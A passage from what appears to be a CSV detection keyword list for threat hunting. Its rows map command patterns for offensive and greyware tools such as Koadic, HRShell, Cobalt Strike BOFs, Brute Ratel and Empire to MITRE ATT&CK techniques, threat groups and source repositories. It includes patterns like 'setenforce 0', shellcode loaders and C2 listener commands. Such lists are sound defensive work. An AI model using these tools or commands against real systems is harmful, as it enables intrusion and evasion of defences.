Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"set shellcode *","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","0","N/A","10","10","244","73","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z" +"set srvhost *","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"set_child *.exe","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"Set-ADObject -SamAccountName * -PropertyName scriptpath -PropertyValue *\*.exe*","greyware_tool_keyword","powershell","AD module Logon Script from remote IP","T1037.001 - T1078.003 - T1046","TA0002 - TA0007 - TA0040","N/A","N/A","AD Enumeration","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"setenforce 0","greyware_tool_keyword","shell","Adversaries may disable security tools to avoid possible detection of their tools and activities. 
This can take the form of killing security software or event logging processes* deleting Registry keys so that tools do not start at run time* or other methods to interfere with security tools scanning or reporting information.","T1055 - T1070.004 - T1218.011","TA0007 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://attack.mitre.org/techniques/T1562/001/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"sh_executor *","offensive_tool_keyword","mythic","mythic C2 agent","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","0","N/A","10","10","11","6","2023-06-30T16:35:47Z","2022-09-28T17:20:04Z" +"sharescan *.txt","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"shell.exe -u http://*","offensive_tool_keyword","cobaltstrike","bypassAV cobaltstrike shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 
- T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/jas502n/bypassAV-1","1","0","N/A","10","10","18","9","2021-03-04T01:51:14Z","2021-03-03T11:33:38Z" +"ShellCmd *","offensive_tool_keyword","covenant","Covenant commands - Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"show shellcodes","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","0","N/A","10","10","244","73","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z" +"SigFlip *","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"SigFlip *.exe*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"sleeper force","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - 
TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crypt0p3g/bof-collection","1","0","N/A","10","10","151","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z" +"sleeper off","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crypt0p3g/bof-collection","1","0","N/A","10","10","151","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z" +"sleeper on","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - 
T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crypt0p3g/bof-collection","1","0","N/A","10","10","151","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z" +"sniffer -*","offensive_tool_keyword","sniffer","A modern alternative network traffic sniffer.","T1040 - T1052.001 - T1046 - T1552.002","TA0011 - TA0007 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/chenjiandongx/sniffer","1","0","N/A","N/A","7","668","58","2022-07-27T15:13:57Z","2021-11-08T15:36:03Z" +"spawn *.exe *.bin*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that spawns a sacrificial process. injects it with shellcode. and executes payload. Built to evade EDR/UserLand hooks by spawning sacrificial process with Arbitrary Code Guard (ACG). BlockDll. 
and PPID spoofing.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/spawn","1","0","N/A","10","10","408","71","2023-03-08T15:53:44Z","2021-07-17T16:35:59Z" +"SprayAD * * ","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","0","N/A","10","10","885","152","2023-05-03T19:35:38Z","2022-04-22T13:43:35Z" +"SprayAD.exe *","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","0","N/A","10","10","885","152","2023-05-03T19:35:38Z","2022-04-22T13:43:35Z" +"ss 
-lntp*","greyware_tool_keyword","ss","replace netstat command - service listening","T1049 - T1040","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","6","10","N/A","N/A","N/A","N/A" +"sudomy -*","offensive_tool_keyword","Sudomy","Sudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing automated reconnaissance (recon) for bug hunting / pentesting","T1595 - T1046","TA0002","N/A","N/A","Reconnaissance","https://github.com/screetsec/Sudomy","1","0","N/A","N/A","10","1720","352","2023-09-19T08:38:55Z","2019-07-26T10:26:34Z" +"SwampThing.csproj","offensive_tool_keyword","SwampThing","SwampThing lets you to spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. The end result is that logging infrastructure will record the fake command line args instead of the real ones","T1036.005 - T1564.002","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing","1","1","N/A","N/A","10","1070","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" +"TokenStrip *","offensive_tool_keyword","cobaltstrike","Beacon Object File to delete token privileges and lower the integrity level to untrusted for a specified process","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - 
TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nick-frischkorn/TokenStripBOF","1","0","N/A","10","10","28","5","2022-06-15T21:29:24Z","2022-06-15T02:13:13Z" +"token-vault create*","offensive_tool_keyword","cobaltstrike","In-memory token vault BOF for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Henkru/cs-token-vault","1","0","N/A","10","10","128","25","2022-08-18T11:02:42Z","2022-07-29T17:50:10Z" +"token-vault remove*","offensive_tool_keyword","cobaltstrike","In-memory token vault BOF for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - 
T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Henkru/cs-token-vault","1","0","N/A","10","10","128","25","2022-08-18T11:02:42Z","2022-07-29T17:50:10Z" +"token-vault set *","offensive_tool_keyword","cobaltstrike","In-memory token vault BOF for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/Henkru/cs-token-vault","1","0","N/A","10","10","128","25","2022-08-18T11:02:42Z","2022-07-29T17:50:10Z" +"token-vault show*","offensive_tool_keyword","cobaltstrike","In-memory token vault BOF for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Henkru/cs-token-vault","1","0","N/A","10","10","128","25","2022-08-18T11:02:42Z","2022-07-29T17:50:10Z" +"token-vault use*","offensive_tool_keyword","cobaltstrike","In-memory token vault BOF for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - 
T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Henkru/cs-token-vault","1","0","N/A","10","10","128","25","2022-08-18T11:02:42Z","2022-07-29T17:50:10Z" +"uselistener http*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"usemodule */*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that 
is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"usestager *","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"wapiti -*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web 